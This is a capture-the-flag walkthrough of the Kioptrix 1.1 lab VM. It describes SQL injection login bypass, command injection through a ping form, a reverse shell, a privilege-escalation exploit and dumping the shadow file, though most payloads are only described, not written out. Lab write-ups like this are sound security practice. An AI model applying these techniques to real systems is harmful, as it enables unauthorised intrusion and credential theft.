Kioptrix 1.1 (lvl2)
Let’s try to learn some from this old machine. Download the VM from VulnHub website, unzip and load in on our VM.
This was supposed to be an easy one and a great compliment from our Kioptrix level 1. Let’s begin.
Discover the IP of our target using arp-scan.
root@kali:~/Desktop/Kioptrix/kioptrix1.1# arp-scan 192.168.1.0/24
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:42:a0, IPv4: 192.168.1.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.15 00:0c:29:51:16:71 VMware, Inc.8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.045 seconds (125.18 hosts/sec). 8 responded
According to our scan, our target resides on 192.168.1.15 IP, from there let’s try to discover available ports by issuing nmap all ports (-p-)command below.
The result showed us that our target has 7 ports open, let’s use those ports to do a more detailed version (-sV) nmap scan below.
So, based on our detailed scan, we have the ff.
port 22 — OpenSSH version 3.9p1 with protocol 1.99
port 80/443 — has Apache httpd webserver version 2.0.52, it also exposes the linux OS — CentOS
ports 111 and 988 — rpcbind
port 631 — runs ipp protocal and using CUPS application version 1.1
port 3306 — has mysql DB
We can do a quick google to search for possible public disclosures against the version we have scanned, as part of our enumeration.
Enumeration
Based on my experience, we have ports 22, 80/443, 3306 as our interesting ports, perhaps we can find a credentials like username and password that was carelessly left on port 80/443 and we can use it to login to mysql DB on port 3306, then we can dump credentials which we can use to remotely login via SSH port 22.
But it was just me, I was getting ahead of myself again and my methodology.
Now, let’s enumerate port 80/443
Port 80/443
- running http-enum of nmap
We got the same web app and OS, and potentials open directories. We can do directory listing using gobuster against this port.
2. running http-comments-displayer to check if there are comments left by devs.
so far, it seems that we don’t have any juicy comments other that a potential username “Administrator”
3. running nikto webapp scan to check for potentials vulnerabilities.
and nikto doesn’t seem to give us an interesting result other than the PHP version the webapp is using. Let’s now try to bust web app directories.
4. running GoBuster to discover files and directories
dir — denotes that we are looking for files and directories
url — our target URL
-w is where our wordlist
-x defines what file extension are we looking for
-s means that we are only interested on server reponse of 200, 204, 302 etc..
So far, we have listed the ff. information to further help us :
- Apache/2.0.52
- CentOS
- PHP 4.3.0
5. Visiting the page using a web browser
We got a login System Admin Page, as we don’t have available credentials yet other than “Administrator” username with no password, we can try to brute force our way in. I have tried various common default password like admin, password, root etc.. but didn’t work.
After trying possible default credentials, we now try to do an sql injection.
Googling mysql injection cheatsheet brought us to a site, I tried the ff.
We intercept the login request to our burp and load the injection above as our payload in burp intruder.
run the intruder and check the difference in length, notice that the length 779 shows that the injection worked against our target. So, we have 4 ways to login to the system using SQL injection.
The page shows a single input and submit button, and seems that all it does is to ping what you have enter in the input.
Let’s try to ping home.
So basically, the app will take your input and ‘execute’ a ping against it and will show the result on a php page. Perhaps, we can do a one-liner multiple commands here, so other than ping command, maybe can perform an ‘ls’ ‘cat’ ‘pwd’ ‘whoami’ etc.. and how to do that? by simply using ‘operators’ like ‘&&’, ‘;’ , ‘|’ etc.
Let’s check if this box accepts one-liner multiple command
And it does!
Let’s try to read /etc/passwd
and we can!
And we got root, john and harold as users with login and shells. Instead of trying to crack user’s password, since the input accepts multiple commands, let’s just try to send a reverse shell back to us.
1st try
2nd try
So we got an apache shell.
Let’s try to escalate our privilege from here. Let’s check the machine’s info, since this is quite an old machine, more likely, there are public exploits available for our target.
Doing a simple system enumeration we arrive with the ff. conclusion.
OS : CentOS release 4–4.3 / 4.5
Searching for publicly available exploits, using searchsploit, we got a possible privilege escalation script that was tested against centOS 4.4/4. Let’s copy it on our working directory and try to read and learn how to use it.
It seems that for this exploit to work againts our target, we need to transfer the raw .c file to our victim, compile and run it.
Setting up our http server using python.
Let’s grab the .c file from our attacker machine using wget.
Compiling the file using gcc and running it inside the target machine.
And we got root!
Dumping the shadow file, and we got john and harold’s credentials.
TAKE AWAYS
- Stick to your methodology. If I were to solve this machine last year, I probably spent much more time than I spent today, my mind would probably be glued on looking for password for Admin. Sticking to your methodology helps, not only in solving boxes but also solidifying it furthermore.
- Old stacks have publicly disclosed exploits. Since the machine is running old tech stacks, it is high probability that exploits against tech stack versions have already been disclosed, google is my friend.
This is a pretty fun and straight forward box. For now, let’s try to do some more easy boxes just to sharpen our syntax familiarity and solidify our methodology and probably we can crack medium to hard boxes 1st month next year.
